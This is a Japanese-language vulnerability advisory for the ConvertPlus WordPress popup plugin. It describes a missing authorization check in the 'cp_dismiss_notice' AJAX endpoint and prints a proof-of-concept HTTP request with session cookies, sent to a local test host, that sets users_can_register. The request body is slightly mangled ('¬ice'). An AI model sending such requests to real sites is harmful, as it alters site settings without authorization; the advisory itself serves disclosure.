
WordPress用ポップアッププラグイン - ConvertPlus <= 3.5.30 - 認証済み(Subscriber+)ユーザーによる限定的なオプション更新に対する認可の欠如
WordPress用ポップアッププラグイン - ConvertPlus <= 3.5.30 - 認証済み(Subscriber+)ユーザーによる限定的なオプション更新を許可する認可欠如
WordPress用ConvertPlusプラグインは、バージョン3.5.30までの全バージョンにおいて、'cp_dismiss_notice' AJAXエンドポイントに権限チェックが欠如しているため、データの不正変更に対して脆弱であり、サービス拒否(DoS)につながる可能性があります。これにより、Subscriberレベル以上のアクセス権を持つ認証済み攻撃者が、WordPressサイト上のオプション値を'1'に更新することが可能になります。これは、サイトにエラーを発生させて正規ユーザーへのサービスを拒否するオプションを更新したり、登録などの一部の値をtrueに設定するために悪用される可能性があります。
注記
この脆弱性ではデータベースに1を入れるだけなので、users_can_register に1を入れることしかできません。
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:5555
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://kubernetes.docker.internal:5555
Connection: keep-alive
Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php
Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011
action=cp_dismiss_notice¬ice=users_can_register